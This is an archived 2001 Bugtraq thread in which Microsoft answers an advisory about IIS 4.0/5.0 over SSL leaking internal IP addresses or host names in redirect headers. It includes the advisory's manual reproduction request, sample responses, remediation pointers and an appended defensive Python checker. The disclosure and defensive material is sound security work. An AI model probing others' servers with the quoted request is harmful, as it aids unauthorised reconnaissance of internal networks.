[22173] in bugtraq
RE: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0
daemon@ATHENA.MIT.EDU (Microsoft Security Response Center)
Thu Aug 9 19:35:54 2001
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Date: Thu, 9 Aug 2001 10:24:52 -0700
Message-ID: <C10F7F33B880B248BCC47DB446738847034BB41A@red-msg-07.redmond.corp.microsoft.com>
From: "Microsoft Security Response Center" <secure@microsoft.com>
To: <bugtraq@securityfocus.com>
Cc: "Microsoft Security Response Center" <secure@microsoft.com>
Content-Transfer-Encoding: 8bit
The checklists for securing IIS4 and IIS5 discuss this issue.
Specifically:
"Disable IP Address in Content-Location
The Content-Location header may expose internal IP addresses that are
usually hidden or masked behind a Network Address Translation (NAT)
Firewall or proxy server. Refer to Q218180 for further information about
disabling this option."
The referenced Knowledge Base Article contains information on how to
force IIS to use the FQDN instead of the IP address.
(Q218180) Internet Information Server Returns IP Address in HTTP Header
(Content-Location) -
http://support.microsoft.com/directory/article.asp?id=KB;EN-US;Q218180
"There is a value that can be modified in the IIS metabase to change the
default behavior from exposing IP addresses to send the FQDN instead.
This allows the IP address to be masked by the domain name."
The IIS4 checklist is available here:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/iischk.asp
And the IIS5 checklist here:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/iis5chk.asp
Regards,
Secure@Microsoft.com
-----Original Message-----
From: Marek Roy [mailto:marek_roy@hotmail.com]
Sent: Tuesday, August 07, 2001 9:55 PM
To: bugtraq@securityfocus.com
Subject: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0
GGS-AU / e-Synergies Security Advisory
August 8, 2001
Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0
Synopsis:
e-Synergies has discovered and researched a remote vulnerability in Internet Information Server from Microsoft. Successful exploitation of this vulnerability can reveal critical internal information such as an internal IP address or internal host name.
Affected Versions:
Microsoft IIS 4.0 running SSL
Microsoft IIS 5.0 running SSL
Description:
By connecting manually to port TCP/443 (SSL) using Perl (SSLeay) or any other tool, a remote user has the ability to retrieve the internal IP address or reveal the machine's network node hostname.
Exploit:
1- Browse the web site using a normal SSL browser and find any directory, e.g.:
https://www.target.com/images/icon.gif
2- Using a compatible SSL Perl script, execute the following command once connected to port 443 of www.target.com:
GET /images HTTP/1.0
3- The result should look like this:
HTTP/1.1 302 Object Moved
Location: https://192.168.1.10/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx
or
HTTP/1.1 302 Object Moved
Location: https://netbiosname/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx
Remarks:
Using HTTP/1.1 instead of HTTP/1.0 will not give the same result.
Credits:
Marek Roy
Senior IT Security Consultant
Please send suggestions, updates, and comments to:
GGS-AU / e-synergies, Sydney, Australia
Level 9
65 York Street
Sydney NSW 2001
Australia
Phone: +61 2 9279 2533
Fax: +61 2 9279 2544
Email: enquiries@ggs-au.com
http://www.ggs-au.com
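A defender-side check for the behaviour discussed in this thread, added here as an example and not code from either message: it parses a raw HTTP response and flags a Location or Content-Location header whose host is a private (RFC 1918 or loopback) address or a single-label, NetBIOS-style name rather than an FQDN. The sample responses are constructed from the advisory's two examples plus one from a server already switched to its FQDN; the Content-Length values are made up.

```python
import ipaddress
from urllib.parse import urlsplit

# Headers this thread identifies as carrying the internal address
LEAK_HEADERS = ("location", "content-location")

def parse_response(raw):
    """Split a raw HTTP response into (status line, {lowercased header: value})."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def classify_host(host):
    """'private-ip' for an RFC 1918/loopback address, 'single-label' for a
    dotless name such as a NetBIOS host name, None for anything else."""
    if not host:
        return None
    try:
        return "private-ip" if ipaddress.ip_address(host).is_private else None
    except ValueError:
        return "single-label" if "." not in host else None

def find_disclosures(raw):
    """Return [(header, host, kind)] for each redirect header whose host looks internal."""
    _, headers = parse_response(raw)
    findings = []
    for name in LEAK_HEADERS:
        value = headers.get(name)
        if value is None:
            continue
        host = urlsplit(value).hostname
        kind = classify_host(host)
        if kind:
            findings.append((name, host, kind))
    return findings

# Constructed sample responses modelled on the advisory's examples (Content-Length invented)
LEAK_IP = ("HTTP/1.1 302 Object Moved\r\nLocation: https://192.168.1.10/images/\r\n"
           "Server: Microsoft-IIS/4.0\r\nContent-Type: text/html\r\nContent-Length: 160\r\n\r\n")
LEAK_NAME = ("HTTP/1.1 302 Object Moved\r\nLocation: https://netbiosname/images/\r\n"
             "Server: Microsoft-IIS/4.0\r\nContent-Type: text/html\r\nContent-Length: 160\r\n\r\n")
FIXED = ("HTTP/1.1 302 Object Moved\r\nLocation: https://www.example.com/images/\r\n"
         "Server: Microsoft-IIS/5.0\r\nContent-Type: text/html\r\nContent-Length: 160\r\n\r\n")
```

Run `find_disclosures()` over the responses your own server returns to the directory request shown in the advisory; an empty list means the redirect now carries the FQDN as the KB article describes.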